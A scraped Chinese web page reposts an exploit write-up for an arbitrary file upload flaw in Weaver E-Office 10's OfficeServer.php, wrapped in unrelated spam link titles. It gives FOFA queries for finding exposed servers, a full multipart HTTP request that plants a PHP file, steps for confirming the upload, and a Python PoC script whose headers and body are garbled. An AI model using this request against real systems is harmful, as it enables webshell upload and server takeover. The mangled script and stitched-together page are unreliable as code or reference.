当前位置: 首页 > news >正文

网站建设资料总结成立公司需要什么材料和手续

news 2026/4/22 21:04:12
网站建设资料总结,成立公司需要什么材料和手续,上海第五届中国国际进口博览会地址,商务网站的类型一共有几大类声明 本文仅用于技术交流#xff0c;请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失#xff0c;均由使用者本人负责#xff0c;文章作者不为此承担任何责任。 漏洞简介 泛微e-ofice是一款标准化的协同0A办公软件#xff0c;泛微 …声明 本文仅用于技术交流请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失均由使用者本人负责文章作者不为此承担任何责任。 漏洞简介 泛微e-ofice是一款标准化的协同0A办公软件泛微 E-ofice 10 0ficeServer 存在任意文件上传漏洞攻击者可以上传任意文件获取webshell在服务器上执行任意命令、读取敏感信息等 FOFA语法 bodyeoffice10 bodyeoffice_loading_tip Poc POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1 Host: xxx.xxx.xxx.xxx User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Length: 395 Content-Type: multipart/form-data; boundary----WebKitFormBoundaryJjb5ZAJOOXO7fwjs Accept-Encoding: gzip, deflate Connection: close------WebKitFormBoundaryJjb5ZAJOOXO7fwjs Content-Disposition: form-data; nameFileData; filename1.jpg Content-Type: image/jpeg?php phpinfo();unlink(__FILE__);? ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs Content-Disposition: form-data; nameFormData{USERNAME:,RECORDID:undefined,OPTION:SAVEFILE,FILENAME:test12.php} ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--漏洞复现 1、访问漏洞环境 2、老形式burp重放一下 出现下面的状态码和响应包说明漏洞可能存在 3、然后访问如下的URL链接,即可查看上传文件内容 http://xxx.xxx.xxx.xxx/eoffice10/server/public/iWebOffice2015/Document/test12.php poc(python脚本 import re import requestsurlhttp://xxxxxxxxxx/eoffice10/server/public/iWebOffice2015/OfficeServer.php headers {User - Agent:Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0,Content - Length:393,Content - Type: multipart / form - data;,boundary ----WebKitFormBoundaryJjb5ZAJOOXO7fwjsAccept - Encoding: gzip, deflate,Connection:close }data {------WebKitFormBoundaryJjb5ZAJOOXO7fwjsContent-Disposition: form-data; nameFileData; filename1.jpg,Content-Type: image/jpeg?php phpinfo();unlink(__FILE__);?------WebKitFormBoundaryJjb5ZAJOOXO7fwjs,Content-Disposition: form-data; nameFormData{USERNAME:,RECORDID:undefined,OPTION:SAVEFILE,FILENAME:test12.php}------WebKitFormBoundaryJjb5ZAJOOXO7fwjs-- }response requests.post(url, headersheaders, datadata)print(Status Code:, response.status_code)if response.status_code 200:print(存在泛微OA E-Office V10 OfficeServer 任意文件上传漏洞) 修复建议 去官网打补丁
http://www.hkea.cn/news/14372774/

相关文章:

  • 网站建设需要的框架结构哪个女装网站做的好
  • 百度网站收录删除做游戏用什么电脑系统下载网站
  • 微信电脑网站是什么原因网站建设和网站优化哪个重要
  • 平面设计短期培训班seo公司是干嘛的
  • 建设银行互联网网站首页苏州能做网站
  • 网页制作与网站建设初学者必看教程dw软件怎么用
  • 网站专题页面文案设计做网络销售如何找客户
  • 怎么用源代码做网站张家港网站建设培训学校
  • 佛山网站建设公司3lue国外以紫色为背景的网站
  • 网站备案怎样提交管局做修车行业需要在哪个网站做推广
  • 网站制作报价单模板达尔罕茂明安网站建设
  • 平台网站建设方案模板下载怎么建立外贸网站
  • 织梦网站会员中心模板微信网站开发教程视频
  • 企业门户网站建设报价手机网站html5模板
  • flash网站整站源码免费下载旅游电子商务网站建设
  • 网站加速cdn自己做wordpress文章添加目录
  • 在线网站搭建系统wordpress好看的底部
  • 针织厂家东莞网站建设zac博客seo
  • 已有域名怎么建设网站昆明网站建设首选
  • 做qq阅读网站介绍百度seo咋做
  • 有做酒席酒水网站吗备案 网站备注
  • 做网赌需要在哪些网站投广告江苏元鼎建设工程有限公司网站
  • 珠海市官网网站建设品牌南宁市住房和城乡建设部网站
  • 建设银行打印回单网站经典广告案例
  • 网站开发在线培训怎么把电脑字体导入wordpress
  • 温州网站制作要多少钱wordpress 加备案号
  • 做网站代理怎么样做公众号好还是网站好
  • 长沙企业网站建设收费住房和城乡建设局网站
  • 鞍山信息港二手房出租宁波seo外包方案
  • 两学一做山西答题网站网站托管如何收费